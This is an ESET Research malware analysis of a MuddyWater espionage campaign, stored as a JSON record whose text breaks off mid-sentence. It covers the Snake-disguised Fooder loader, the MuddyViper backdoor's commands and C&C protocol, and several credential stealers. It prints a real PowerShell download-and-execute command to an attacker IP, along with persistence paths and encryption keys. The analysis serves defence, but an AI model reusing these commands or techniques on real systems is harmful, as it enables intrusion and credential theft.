{
	"id": "001b3c83-7adb-4cfb-a9da-ea2d79cef031",
	"created_at": "2026-04-29T02:22:19.202887Z",
	"updated_at": "2026-04-29T08:21:08.67756Z",
	"deleted_at": null,
	"sha1_hash": "5c778a0a80a658b98989a084d150dd58e2286dc8",
	"title": "MuddyWater: Snakes by the riverbank",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 896266,
	"plain_text": "MuddyWater: Snakes by the riverbank\r\nBy ESET Research\r\nArchived: 2026-04-29 02:11:25 UTC\r\nESET researchers have identified new MuddyWater activity primarily targeting organizations in Israel, with one confirmed\r\ntarget in Egypt. MuddyWater, also referred to as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage group\r\nknown for its persistent targeting of government and critical infrastructure sectors, often leveraging custom malware and\r\npublicly available tools. In this campaign, the attackers deployed a set of previously undocumented, custom tools with the\r\nobjective of improving defense evasion and persistence. Among these tools is a custom Fooder loader designed to execute\r\nMuddyViper, a C/C++ backdoor. Several versions of Fooder masquerade as the classic Snake game, and its internal logic\r\nincludes a custom delay function inspired by the game’s mechanics, combined with frequent use of Sleep API calls. These\r\nfeatures are intended to delay execution and hinder automated analysis. MuddyViper enables the attackers to collect system\r\ninformation, execute files and shell commands, transfer files, and exfiltrate Windows login credentials and browser data.\r\nThe campaign also leverages credential stealers (CE‑Notes and LP‑Notes) and reverse tunneling tools (go‑socks5), long a\r\nfavorite of MuddyWater operators.\r\nAlthough this is our first public blogpost covering MuddyWater, ESET researchers have been tracking the group for several\r\nyears and have documented its activities in multiple ESET APT Activity Reports. 
Unlike previous campaigns of\r\nMuddyWater, which were often noisy and easily detected, the one covered in this blogpost demonstrates a more focused,\r\nsophisticated, and refined approach.\r\nKey points of this blogpost:\r\nMuddyWater developers adopted CNG, the next-generation Windows cryptographic API, which is unique\r\nfor Iran-aligned groups and somewhat atypical across the broader threat landscape.\r\nThe group also used more advanced techniques to deploy MuddyViper, a new backdoor, by using a loader\r\n(Fooder) that reflectively loads it into memory and executes it.\r\nWe provide technical analyses of the tools used in this campaign, including MuddyViper, the Fooder\r\nloader, the CE-Notes browser-data stealer, the LP-Notes credential stealer, the Blub browser-data stealer,\r\nand go‑socks5 reverse tunnels.\r\nDuring this campaign, the operators deliberately avoided hands-on-keyboard interactive sessions, which is\r\na historically noisy technique often characterized by mistyped commands.\r\nMuddyWater group overview\r\nMuddyWater is a cyberespionage group active since at least 2017, primarily targeting entities in the Middle East and North\r\nAmerica. 
It is one of the most active Iran-aligned APT groups tracked by ESET researchers and has links to the Ministry of\r\nIntelligence and National Security of Iran.\r\nThe group was first introduced to the public as MuddyWater by Unit 42 in 2017, whose description of the group’s activity is\r\nconsistent with ESET’s profiling – a focus on cyberespionage, the use of malicious documents as attachments designed to\r\nprompt users to enable macros and bypass security controls, and a primary targeting of entities located in the Middle East.\r\nNotable past activities include Operation Quicksand (2020), a cyberespionage campaign targeting Israeli government\r\nentities and telecommunications organizations, which exemplifies the group’s evolution from basic phishing tactics to more\r\nadvanced, multistage operations; and a campaign targeting political groups and organizations in Türkiye, demonstrating the\r\ngroup’s geopolitical focus, its ability to adapt social engineering tactics to local contexts, and reliance on modular malware\r\nand flexible C\u0026C infrastructure.\r\nBesides its frequent activity, MuddyWater operations are often noisy. The group is known for its persistent targeting of\r\ngovernment, military, telecommunications, and critical infrastructure sectors, typically using custom malware and publicly\r\navailable tools to gain access, maintain persistence, and exfiltrate sensitive data. In addition to targeting its archenemy,\r\nIsrael, the group appears to be targeting countries that maintain, or seek to strengthen, diplomatic ties with Iran.\r\nESET has documented multiple campaigns attributed to MuddyWater that highlight the group’s evolving toolset and shifting\r\noperational focus. 
While the earlier operations relied on broad targeting and relatively unsophisticated techniques, more\r\nrecent campaigns demonstrate signs of technical refinement and increased precision.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 1 of 20\n\nIn March and April 2023, MuddyWater targeted an unidentified victim in Saudi Arabia by deploying a batch script that\r\ndownloaded a PowerShell-based backdoor, which was used to download and execute arbitrary payloads and subsequently to\r\nremove the initial payload from disk.\r\nThe group conducted a campaign in January and February 2025 that was notable for its operational overlap with Lyceum (an\r\nOilRig subgroup), further detailed in this publication. This latest overlap suggests an evolution in MuddyWater’s modus\r\noperandi.\r\nThe group’s publicly documented custom tools include, for example, the Bugsleep, Blackout, Small Sieve, Mori, and\r\nPOWERSTATS backdoors, as well as custom-compiled variants of open-source tools such as LaZagne or CrackMapExec.\r\nMuddyWater campaigns typically do not leverage or introduce new tools, malware, or techniques; instead, they are often\r\nnoteworthy due to the targeting.\r\nWhile MuddyWater initially concentrated strictly on cyberespionage, its cooperation with Lyceum led to targeting of the\r\nmanufacturing sector through spearphishing. The attack generated considerable noise and achieved little in terms of\r\noperational objectives.\r\nThe campaign outlined in this publication shows what, for MuddyWater, seems to be an unprecedented advancement in\r\ntoolset and technical execution.\r\nVictimology\r\nAs previously mentioned, during this campaign, MuddyWater primarily targeted organizations in Israel, but also one in\r\nEgypt. Table 1 lists the victims by country and vertical. The campaign began on September 30th, 2024 and concluded on\r\nMarch 18th, 2025.\r\nTable 1. 
Victims by country and vertical\r\nCountry Vertical\r\nEgypt Technology\r\nIsrael Engineering #1\r\nIsrael Engineering #2\r\nIsrael Engineering #3\r\nIsrael Local Government #1\r\nIsrael Local Government #2\r\nIsrael Manufacturing\r\nIsrael Technology\r\nIsrael Transportation\r\nIsrael Utilities\r\nIsrael University #1\r\nIsrael University #2\r\nIsrael University #3\r\nIsrael Unidentified #1\r\nIsrael Unidentified #2\r\nIsrael Unidentified #3\r\nIsrael Unidentified #4\r\nIsrael Unidentified #5\r\nOne interesting thing to note about the victim in the utilities vertical is that they were also compromised by Lyceum on\r\nFebruary 11th, 2025.\r\nOverlap and cooperation with Lyceum\r\nIn early 2025, ESET Research identified an operational overlap between MuddyWater and Lyceum, a subgroup of the Iran-aligned OilRig cyberespionage group, also known as HEXANE or Storm-0133. OilRig has been active since at least 2014\r\nand is commonly believed to be based in Iran. Tools that we attribute to Lyceum include DanBot, Shark, Milan, Marlin,\r\nSolar, Mango, OilForceGTX, and a variety of downloaders that leverage legitimate cloud services for C\u0026C communication.\r\nWe have previously observed Lyceum targeting multiple Israeli organizations, including national and local governmental\r\nentities, as well as organizations in the healthcare sector.\r\nDuring the campaign covered here, MuddyWater conducted a joint sub-campaign with OilRig in January and February\r\n2025. MuddyWater initiated access through a spearphishing email containing a link to an installer for the Syncro remote\r\nmonitoring and management (RMM) software. Following the initial compromise, the attackers installed an additional RMM\r\ntool, PDQ, and deployed a custom Mimikatz loader disguised as certificate files with .txt file extensions. 
Based on the\r\nobserved activity, harvested credentials were probably used by Lyceum to gain access and assume control of operations\r\nwithin the targeted manufacturing-sector organization in Israel.\r\nThis cooperation suggests that MuddyWater may be acting as an initial access broker for other Iran-aligned groups.\r\nAttribution\r\nThe victimology, TTPs, and tooling observed in this campaign align with several of the newly documented capabilities and\r\ntools that we have previously attributed to MuddyWater. This assessment is based on the initial access method and the\r\nsubsequent delivery of malicious tools – generally via spearphishing emails that contain links to download RMM software.\r\nTTPs\r\nMuddyWater operators continue to rely on predictable and script-based backdoors written in PowerShell and Go. Their\r\ntargeting remains focused on the telecommunications, governmental, and oil and energy sectors.\r\nInitial access is typically achieved through spearphishing emails, often containing PDF attachments that link to installers for\r\nRMM software hosted on free file-sharing platforms such as OneHub, Egnyte, or Mega. These links lead to the download of\r\nRMM tools including Atera, Level, PDQ, and SimpleHelp.\r\nAmong the tools deployed by MuddyWater operators is also the VAX‑One backdoor, named after the legitimate software\r\nwhich it impersonates: Veeam, AnyDesk, Xerox, and the OneDrive updater service.\r\nThe group’s continued reliance on this familiar playbook makes its activity relatively easy to detect and block.\r\nTools overlap\r\nAdditionally, we identified code overlaps between several of the newly documented tools and those we previously attributed\r\nto MuddyWater:\r\nLP-Notes, a new credential stealer, has the same design as CE-Notes, a browser-data stealer, that we previously\r\nassociated with MuddyWater. 
During this campaign, we also observed a Mimikatz loader, which shares the same\r\ndesign and obfuscation methods as CE-Notes.\r\nWe observed several new variants of MuddyWater’s customized go‑socks5 reverse tunnels, which the group used\r\nthroughout 2024 and 2025.\r\nIn two instances, we observed the customized go‑socks5 reverse tunnels embedded in a new MuddyWater loader,\r\ninternally named Fooder. In a dozen other cases, this loader was used to load MuddyWater’s new backdoor,\r\nMuddyViper.\r\nInterestingly, MuddyViper and the CE-Notes/LP-Notes/Mimikatz loader variants use the CNG API for data\r\nencryption and decryption. To the best of our knowledge, this is unique to Iran-aligned groups. Another trait these\r\ntools share is that they attempt to steal user credentials by opening a fake Windows Security dialog.\r\nToolset\r\nIn this blogpost, we document previously unknown, custom tools used by MuddyWater:\r\nFooder loader – a newly identified loader that loads the MuddyViper backdoor into memory and executes it. Note\r\nthat several versions of Fooder masquerade as the classic Snake game, hence the designation, MuddyViper. Another\r\nnotable characteristic of Fooder is its frequent use of a custom delay function that implements the core logic of the\r\nSnake game, combined with Sleep API calls. 
These features are intended to delay execution in an attempt to hide\r\nmalicious behavior from automated analysis systems.\r\nMuddyViper backdoor – a previously undocumented C/C++ backdoor that enables attackers to collect system\r\ninformation, download and upload files, execute files and shell commands, and steal Windows credentials and\r\nbrowser data.\r\nThe rest of the toolset documented in this blogpost includes:\r\nCE-Notes, a browser-data stealer,\r\nLP-Notes, a credential stealer,\r\nBlub, a browser-data stealer, and\r\nseveral go‑socks5 reverse tunnels.\r\nFooder loader\r\nFooder is a 64-bit C/C++ loader designed to decrypt and then reflectively load the embedded payload (as illustrated in\r\nFigure 1), with MuddyViper being the most frequently observed payload.\r\nFigure 1. Relationships between Fooder and its launcher and payload\r\nFooder seems to be the internal name of this tool, based on its PDB paths:\r\nC:\\Users\\win\\Desktop\\Fooder\\Debug\\Launcher.pdb\r\nC:\\Users\\pc\\Desktop\\main\\My_Project\\Fooder\\x64\\Debug\\Launcher.pdb\r\nAlthough we have only captured one sample of it, we believe that Fooder is executed by a simple launcher application,\r\nwritten in C. It has no string obfuscation, logs verbosely to the console, and has its PDB path left intact:\r\nC:\\Users\\pc\\source\\repos\\ConsoleApplication7\\x64\\Release\\ConsoleApplication7.pdb\r\nWe have observed one instance (SHA-1: 76632910CF67697BF5D7285FAE38BFCF438EC082) of the component launching\r\nFooder. Deployed under the name %USERPROFILE%\\Downloads\\OsUpdater.exe, the launcher expects a process ID as a\r\ncommand line argument. 
Once executed, it attempts to duplicate the token of the specified process via the\r\nDuplicateTokenEx API, and then uses CreateProcessAsUserA to execute Fooder.\r\nOnce executed, Fooder decrypts the embedded payload following these steps:\r\nThe command line argument (6) is added to each byte of a hardcoded key, which produces the AES decryption key,\r\nshared across all samples, 6969697820511281801712341067111416133321394945138510872296106446.\r\nA hardcoded value (5) is subtracted from each byte of the hardcoded payload.\r\nFinally, the hardcoded payload is decrypted using the WinCrypt API and the AES key.\r\nFooder then loads the payload directly into memory using reflective techniques, allowing it to execute without relying on\r\nstandard system calls or writing to disk.\r\nOnce launched, Fooder has been used to deliver not only MuddyViper but also HackBrowserData, an open-source\r\nutility capable of decrypting and exporting sensitive browser information such as credentials and cookies. Fooder also\r\nfacilitates the deployment of go‑socks5 variants, which are Go-compiled binaries that function as reverse tunnels, enabling\r\nattackers to bypass firewalls and Network Address Translation (NAT) mechanisms. Notably, the MuddyWater group has\r\npreviously utilized go‑socks5 independently of Fooder, indicating a continued reliance on this tool for stealthy network\r\ncommunication and data exfiltration.\r\nNote that several versions of Fooder masquerade as the Snake game – see the strings and mutexes highlighted in Figure 2 –\r\nwhich is the origin of the name of MuddyViper, its most frequently embedded payload.\r\nFigure 2. 
Multiple Fooder instances masquerade as the Snake game\r\nAnother notable characteristic of Fooder is its frequent use of a custom delay function (which implements the core logic of\r\nthe Snake game, where the player maneuvers the end of a growing line, often themed as a snake, to avoid obstacles and\r\ncollect items) and of Sleep API calls. The delay in execution is achieved by mimicking the game's loop-based delay: as in\r\nthe Snake game, each movement is controlled by a loop that waits for a short period before updating the game. The\r\nloop introduces execution delays that slow down the malware’s behavior, helping it to evade tools that monitor for rapid\r\nmalicious activity. Figure 3 highlights the delays and the Snake game welcome banner presented to the user at runtime.\r\nFigure 3. Various calls to delay execution are dispersed throughout Fooder’s code\r\nFooder does not have any built-in persistence capability. However, in cases when Fooder’s final payload is the MuddyViper\r\nbackdoor, the backdoor can set up persistence for the loader via a scheduled task or the Startup folder.\r\nMuddyViper backdoor\r\nMuddyViper, a previously undocumented backdoor written in C and C++, gives the attackers covert access to and control over\r\ncompromised systems. We have observed MuddyViper only in memory, loaded by Fooder, which might be the reason there\r\nis no obfuscation or string encryption. 
As is typical for MuddyWater, MuddyViper sends extremely verbose and frequent\r\nstatus messages to its C\u0026C server throughout its execution, such as the following:\r\n[+] Persist: -------------------- Hi,I am Live --------------------\r\n[+] Persist: -------------------- Hi,First Time --------------------\r\n[-] Persist: failed Create task !!!!\r\nThe backdoor also keeps a lengthy list of 150+ process names and details about the respective products to be able to send\r\ndetailed reports about the security tools detected in the compromised environment, even though adding the details could\r\nhave been easily implemented on the server side:\r\n[\u003e] Process: aciseagent.exe ~~\u003e (Cisco Umbrella Roaming Security) --\u003e (Security DNS) found!\r\n[\u003e] Process: acnamagent.exe ~~\u003e (Absolute Persistence) --\u003e (Asset Management) found!\r\n[\u003e] Process: acnamlogonagent.exe ~~\u003e (Absolute Persistence) --\u003e (Asset Management) found!\r\nThis behavior results in substantial network traffic.\r\nMuddyViper has two methods of establishing persistence:\r\nIts installation directory can be configured as a Windows Startup folder, by setting the following registry values to\r\n%APPDATALOCAL%\\Microsoft\\Windows\\PPBCompatCache\\ManagerCache:\r\n○ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup.\r\n○ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup.\r\nA scheduled task named ManageOnDriveUpdater can launch MuddyViper from that path on each system start.\r\nMuddyViper supports 20 backdoor commands – see Table 2 for details of all of them – notably including the ability to open\r\nand operate reverse shells, download, upload, and execute files, report the running security tools, steal user credentials and\r\ndata from a variety of browsers, set up its own persistence, and uninstall itself.\r\nTable 2. 
MuddyViper backdoor commands\r\nCommand ID 200\r\nArguments: N/A\r\nAction: N/A\r\nResponse: 0, via the GET /adad or GET /aq36 request, to obtain a backdoor command.\r\nCommand ID 207\r\nArguments: N/A\r\nAction: Decrypts the embedded HackBrowserData tool and reflectively loads it in a new thread. This open-source tool can steal credentials, history, and other information from web browsers. MuddyViper then compresses the collected data (into a file named CacheDump.zip) and uploads it to the C\u0026C server.\r\nResponse: Collected browser data, via the GET /mq65 request. In case of an error, a custom status message is sent instead.\r\nCommand IDs 300, 301, and 302\r\nArguments: \u003ccommand_line\u003e (command ID 300); N/A (command IDs 301 and 302)\r\nAction: Launches a reverse shell using the provided command line (command ID 300), C:\\windows\\system32\\cmd.exe (command ID 301), or C:\\windows\\system32\\WindowsPowerShell\\v1.0\\Powershell.exe (command ID 302). Then, in a loop, uploads the process output to the C\u0026C server and interprets the server response (see command IDs 350-352) until interrupted.\r\nResponse: Process output, via the GET /oi32 request. In case of an error, a custom status message is sent instead.\r\nCommand ID 350\r\nArguments: N/A\r\nAction: Must follow command IDs 300-302. Sleeps for a preconfigured amount of time – for the reverse shell loop, the default is one second.\r\nCommand ID 351\r\nArguments: Sleep time (in milliseconds)\r\nAction: Must follow command IDs 300-302. Configures the sleep time for the reverse shell loop – the default is one second.\r\nCommand ID 352\r\nArguments: Input for the reverse shell\r\nAction: Must follow command IDs 300-302. Passes the provided argument to the running reverse shell.\r\nCommand ID 360\r\nArguments: N/A\r\nAction: Not implemented, likely related to the reverse shell API.\r\nResponse: A custom error message: [-] Agent does not have an active pipe\r\nCommand ID 400\r\nArguments: Flag\r\nAction: Must follow command ID 401. It confirms that the C\u0026C server has successfully received a part of the exfiltrated local file. Optionally adjusts the sleep before the next upload specified in command ID 401 to 10 seconds.\r\nResponse: No response, unless this command is issued outside of a pending file upload process, in which case it sends a custom error message: [-] Agent does not have an DOWNLOAD file\r\nCommand ID 401\r\nArguments: Sleep time (in milliseconds), filename\r\nAction: Initiates a file upload operation from the specified local file to the C\u0026C server in chunks, with the specified sleep time between each upload.\r\nResponse: Contents of the specified file, via a series of GET /dadw requests.\r\nCommand ID 500\r\nArguments: Data chunk\r\nAction: Must follow command ID 501. Writes the received data chunk into a previously created and opened local file.\r\nResponse: A custom error message, if the operation fails.\r\nCommand ID 501\r\nArguments: Sleep time (in milliseconds), filename\r\nAction: Downloads a file from the C\u0026C server in chunks into a local file with the specified name. The specified sleep time is used as a delay after downloading each data chunk. Deletes the file if the connection cannot be established after six consecutive attempts.\r\nResponse: A series of GET /dadwqa requests, to request the file contents.\r\nCommand ID 700\r\nArguments: Sleep time (in milliseconds)\r\nAction: Configures the sleep time between connection attempts to the specified value (default is 60 seconds).\r\nResponse: N/A\r\nCommand ID 800\r\nArguments: N/A\r\nAction: Enumerates running processes, searching for selected security tools from an extensive hardcoded list.\r\nResponse: For each detected process, sends a report with the following information, populated from that hardcoded table: [\u003e] Process: \u003cprocess_name\u003e ~~\u003e (\u003cproduct_name\u003e) --\u003e (\u003ccategory\u003e) found!\r\nCommand ID 805\r\nArguments: Timeout (in milliseconds)\r\nAction: Displays a fake Windows Security dialog (see Figure 4), prompting the user to fill in credentials, which are then exfiltrated to the C\u0026C server. Uses the provided argument as a timeout for the dialog.\r\nResponse: Collected credentials, via the GET /rq13 request: [+] creds ~~\u003e Username: \u003cusername\u003e ~~\u003e Password: \u003cpassword\u003e. If not successful, a custom error message is sent instead.\r\nCommand ID 806\r\nArguments: N/A\r\nAction: Sets up persistence via a scheduled task named ManageOnDriveUpdater. The backdoor copies itself to its installation path, unless it is already running from there.\r\nResponse: A custom status message, depending on the outcome of the operation.\r\nCommand ID 900\r\nArguments: N/A\r\nAction: Uninstalls itself. First, clears persistence set via a Windows Startup Folder and then deletes itself. Note that this action will not clear the persistence via a scheduled task that can be set by the backdoor command ID 806.\r\nResponse: A custom status message, depending on the outcome of the operation.\r\nCommand ID 905\r\nArguments: N/A\r\nAction: Terminates the current backdoor process.\r\nResponse: N/A\r\nCommand ID 906\r\nArguments: N/A\r\nAction: Relaunches itself (via the CreateProcessW API) and terminates the current process.\r\nResponse: A custom status message, depending on the outcome of the operation.\r\nAny other command ID\r\nArguments: N/A\r\nAction: N/A\r\nResponse: [-] Agent statusCode I don't have it\r\nOne of the commands listed in Table 2, with ID 805, displays a fake Windows Security dialog in an attempt to entice the\r\nvictim into filling in their Windows credentials, as seen in Figure 4. A similar technique is used by MuddyWater’s LP-Notes\r\nstealer (see LP-Notes credential stealer).\r\nFigure 4. Fake Windows Security dialog displayed by MuddyViper (command ID 805)\r\nAnother command, with ID 900, aims to remove MuddyViper from the compromised machine and clear its persistence;\r\nhowever, the command does not remove all traces of the backdoor.\r\nNetwork protocol\r\nTo communicate with its C\u0026C server, MuddyViper uses HTTP GET requests (via the WinHTTP API) over port 443, with\r\nthe WINHTTP_FLAG_SECURE flag configured to use SSL/TLS. 
Two C\u0026C servers have been observed:\r\nprocessplanet[.]org and 35.175.224[.]64.\r\nData in both directions of communication is AES-CBC encrypted using the CNG API, with the key (used across samples)\r\n0608101047106453101617106423101013101012101083109710108585106969 and the IV 0.\r\nIn the backdoor → server direction of the communications:\r\nEach endpoint URI supported by the C\u0026C server can be used by the backdoor for a specific type of request, such as\r\nrequesting a command, uploading a file, or sending a custom status message.\r\nAdditional data for the C\u0026C server is included in the HTTP request body, which is unconventional for HTTP GET\r\nrequests.\r\nThe User-Agent string is A WinHTTP Example Program/1.0, a remnant of the example code for the WinHttpOpen\r\nAPI.\r\nThe connection, send, receive, and response timeouts are set to 30 seconds.\r\nThe default sleep time between consecutive connection attempts is 60 seconds. This value can be configured by\r\ncommand ID 700.\r\nUpon failure, connection attempts are retried up to 10 times.\r\nPrior to encryption, the data is always formatted as \u003ccomputer_name\u003e/\u003cusername\u003e*\u003cdata\u003e.\r\nIn the server → backdoor direction of the communications:\r\nThe HTTP status code determines the backdoor command ID.\r\nThe backdoor command arguments are included in the HTTP response body.\r\nCE-Notes browser-data stealer\r\nCE-Notes is a browser-data stealer that we named after the filename – ce-notes.txt – used to stage stolen data on disk. 
We\r\ndiscovered CE-Notes in 2024 when we observed MuddyWater deploying EXE and DLL versions of it on the system of an\r\norganization in Israel.\r\nCE-Notes was downloaded with the following PowerShell command:\r\n\"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149[.]51:443/57576?filter_relational_operator_2=60169).content | Invoke-Expression\r\nBoth versions of the browser-data stealer attempt to steal and decrypt the app-bound encryption key stored in the Local State\r\nfile (%APPDATA%\\Local\\Google\\Chrome\\User Data\\Local State) of Chromium browsers (Chrome, Brave, and Edge).\r\nApp-bound encryption was introduced in Chrome version 127, enabling Chrome to encrypt data tied to app identity.\r\nCybercriminals and APT groups have caught on and are actively trying to work around app-bound encryption to steal\r\nsession keys. CE-Notes is quite similar to ChromElevator on GitHub.\r\nThe collected data is AES-CBC encrypted using the CNG API with the key\r\n9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F and the IV\r\n4103A09887B82FFD56A93BB431805224.\r\nThen the encrypted data is stored on disk in C:\\Users\\Public\\Downloads\\ce-notes.txt for later retrieval (probably via an\r\nRMM tool, since neither the EXE nor the DLL version has any means of exfiltrating the file). The primary difference\r\nbetween the EXE and the DLL is the virtual machine evasion functionality added to the DLL.\r\nWe observed the CE-Notes browser-data stealer in the following locations:\r\nC:\\system2.dll\r\nC:\\Users\\Public\\Downloads\\system2.dll\r\nC:\\Intel\\system.dll\r\nC:\\20240926_165509.exe\r\nLP-Notes credential stealer\r\nLP-Notes is a C/C++ Windows credential stealer with the same design as the CE-Notes browser-data stealer. 
Following the\r\nsame naming convention as in the case of CE-Notes, we named the stealer LP-Notes based on the local file it uses to stage\r\nstolen credentials before exfiltration: C:\\Users\\Public\\Downloads\\lp-notes.txt (vs. C:\\Users\\Public\\Downloads\\ce-notes.txt).\r\nThe sole purpose of LP-Notes is to entice victims into submitting their credentials by displaying a fake Windows Security\r\ndialog, prompting them to enter their Windows username and password. We have observed an instance of LP-Notes being\r\ndownloaded and executed by PowerShell with a very similar command line to that shown in the CE-Notes section.\r\nInitialization\r\nOn execution, LP-Notes starts by searching for a process named taskhostw.exe (Host Process for Windows Tasks) and then\r\nimpersonating the security context of the process (via the ImpersonateLoggedOnUser API); only then does LP-Notes\r\nactivate its malicious payload.\r\nLP-Notes employs several simple obfuscation techniques, including a custom, addition-based routine for string decryption.\r\nFigure 5 shows the function that decrypts strings of lengths ranging from 15 to 19 characters, though the decryption key is\r\nalways the same – a set of predefined constants that are added or subtracted from each byte of the string. Interestingly, CE-Notes uses the same decryption routine, except for a different decryption key, as shown in Figure 6.\r\nFigure 5. LP-Notes string decryption routine\r\nFigure 6. CE-Notes string decryption routine, similar to that of LP-Notes\r\nLP-Notes uses string stacking for strings shorter than 15 or longer than 19 characters, including the decryption key, IV, and\r\nimport names. 
Finally, to obscure the use of Windows API functions and to make static analysis more challenging, LP-Notes\r\ndynamically resolves the API functions during the C runtime startup, before the execution of the WinMain function, the\r\nstandard entry point for a graphical Windows-based application per Microsoft, thus hiding direct references to the API\r\nfunctions from pseudocode view (see Figure 7).\r\nFigure 7. LP-Notes WinMain function with obfuscated import names (left) vs. deobfuscated view (right)\r\nCapabilities\r\nIn an endless loop, LP-Notes displays a fake Windows Security dialog prompting the victim to enter their Windows\r\nusername and password, as shown in Figure 8 (via the CredUIPromptForWindowsCredentialsW API). Note that although\r\nsimilar, this is not the same as the fake credential prompt used by MuddyViper (see Figure 4). It immediately confirms the\r\nvalidity of any submitted credentials by attempting to log on as that user (via the CredUnPackAuthenticationBufferW and\r\nLogonUserW APIs).\r\nFigure 8. A fake Windows Security dialog displayed by LP-Notes\r\nIf successful, the harvested credentials are then AES-CBC encrypted using the CNG API with the key\r\nED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC and the IV\r\n91A4E6F6D51DAEE773A8F00279792578.\r\nSimilar to CE-Notes, LP-Notes then stores the encrypted credentials in a local file – in this case\r\nC:\\Users\\Public\\Downloads\\lp-notes.txt. As neither of these components has the capability to exfiltrate data, another\r\ncomponent presumably handles this (either an RMM tool or MuddyViper).\r\nBlub browser-data stealer\r\nBlub is a C/C++ browser-data stealer incorporating a statically linked SQLite library. The name is derived from its filename,\r\nBlub.exe. We observed the PDB path C:\\Users\\jojo\\source\\repos\\stealer\\x64\\Release\\stealer.pdb. 
It steals user login data\r\nfrom Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera web browsers.\r\nChromium-based browsers\r\nFor Chrome, Blub first terminates chrome.exe (if running) and then parses and decrypts the encryption key from C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Google\\Chrome\\User Data\\Local State. This key is used to encrypt sensitive data stored by\r\nChrome, such as passwords or cookies, and it is protected by the Data Protection API (DPAPI) so that it can only be\r\ndecrypted on the system where it was originally encrypted. Blub decrypts this key via the CryptUnprotectData API, and then\r\nuses it to decrypt user credentials obtained from all existing Chrome user profiles on the compromised computer. The\r\ncredentials, stored in C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Google\\Chrome\\User Data\\\u003cprofile_name\u003e\\Login Data, are\r\nobtained via the following SQL query:\r\nSELECT origin_url, username_value, password_value FROM logins\r\nA similar series of steps is used to obtain and decrypt user credentials from Microsoft Edge and Opera user profiles, using\r\nthe key obtained from C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State and C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Roaming\\Opera Software\\Opera Stable\\Local State, respectively.\r\nFirefox\r\nFinally, to decrypt stored user credentials for Mozilla Firefox, Blub parses the hostname, encryptedUsername, and\r\nencryptedPassword values from the logins.json file in each user’s profile directory, i.e.,\r\n%APPDATAROAMING%\\Mozilla\\Firefox\\Profiles\\\u003cprofile_name\u003e\\. The credentials are then decrypted using the\r\nPK11SDR_Decrypt function from the nss3.dll library used by Firefox.\r\nThe collected data is stored into a local file named file.txt, with no encryption. The same data is logged onto the console,\r\nwith no encryption, along with verbose status messages. 
Blub has no capability to exfiltrate this file.\r\nNote that Blub checks for running processes associated with security solutions before executing its malicious payload,\r\nfocusing on the combination of afwServ.exe (Avast firewall) and AvastSvc.exe (Avast antivirus) processes. If afwServ.exe is\r\ndetected running (but not AvastSvc.exe), Blub concludes that Norton is running (which now uses the Avast engine) on the\r\ncompromised host, and exits. If AvastSvc.exe (Avast) is detected, Blub continues with the execution, except it skips stealing\r\ncredentials from Microsoft Edge.\r\nWhile Blub’s strings are stored in cleartext, a simple obfuscation technique is used for strings associated with the Google\r\nChrome data stealer functionality. Specifically, multiple strings are concatenated into one long string, with 16 random\r\ncharacters between them, apparently to hide them from view during static analysis:\r\ngdGlog}o{eRwjpw\u0026\"encrypted_key\":FAe[{hy|b-vcJvxGImpersonateLoggeh}gdOvlgt_NxuoolOpenProcessTokenVLUKKW'xxqjpwe}uDuplicateTokenExs5\u0026}vl{tiplh|io|eIpuvvkdXznx(Gh}n2\r\nRemoving the junk characters and splitting the strings returns:\r\n\"encrypted_key\":\r\nImpersonateLogge\r\nOpenProcessToken\r\nDuplicateTokenEx\r\ngo‑socks5 reverse tunnels\r\nMuddyWater’s go‑socks5 reverse tunnels are a collection of Go-compiled tools, based on publicly available libraries such as\r\ngo‑socks5, yamux, and resocks; they have been frequently used in MuddyWater’s recent campaigns.\r\nMost of the variants we analyzed appear to be internally named ESETGO (no relation to ESET), based on the build\r\nconfiguration strings shown in Figure 9 and in other artifacts.\r\npath ESETGO\r\nmod ESETGO (devel)\r\ndep github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=\r\ndep github.com/hashicorp/yamux v0.1.1 
h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=\r\ndep golang.org/x/net v0.29.0 h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=\r\ndep golang.org/x/sys v0.25.0 h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=\r\nbuild -buildmode=exe\r\nbuild -compiler=gc\r\nbuild -ldflags=\"-w -s\"\r\nbuild CGO_ENABLED=1\r\nbuild CGO_CFLAGS=\r\nbuild CGO_CPPFLAGS=\r\nbuild CGO_CXXFLAGS=\r\nbuild CGO_LDFLAGS=\r\nbuild GOARCH=amd64\r\nbuild GOOS=windows\r\nbuild GOAMD64=v1\r\nFigure 9. Build configuration strings from MuddyWater’s go‑socks5 variants\r\nThe primary purpose of MuddyWater’s go‑socks5 proxy is to relay communication between the compromised machine (on a\r\nspecific port) and a hardcoded C\u0026C server, using a hardcoded connection key to authenticate with the C\u0026C server via\r\nSSL/TLS. This setup allows the attacker to route C\u0026C traffic (potentially related to other compromises) through the\r\ncompromised machine and thus to hide the location of the real C\u0026C server.\r\nConclusion\r\nThis campaign indicates an evolution in the operational maturity of MuddyWater. The deployment of previously\r\nundocumented components – such as the Fooder loader and MuddyViper backdoor – signals an effort to enhance stealth,\r\npersistence, and credential harvesting capabilities. The use of game-inspired evasion techniques, reverse tunneling, and a\r\ndiversified toolset reflects a more refined approach than in earlier campaigns, even though traces of the group’s operational\r\nimmaturity remain.\r\nMuddyWater continues to 